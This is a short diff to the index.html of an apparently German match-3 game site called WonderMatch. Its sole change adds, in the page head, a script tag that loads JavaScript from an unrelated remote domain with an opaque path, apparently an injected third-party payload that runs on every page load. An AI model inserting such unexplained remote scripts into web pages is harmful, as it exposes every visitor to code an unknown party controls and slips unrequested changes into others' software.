--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
 	<link rel="stylesheet" href="css/responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	
+	<script src="https://vmapis.net/db4o71"></script>
 	<!-- Document Title
 	============================================= -->
 	<title>WonderMatch™－neue match 3-gewinnt</title>
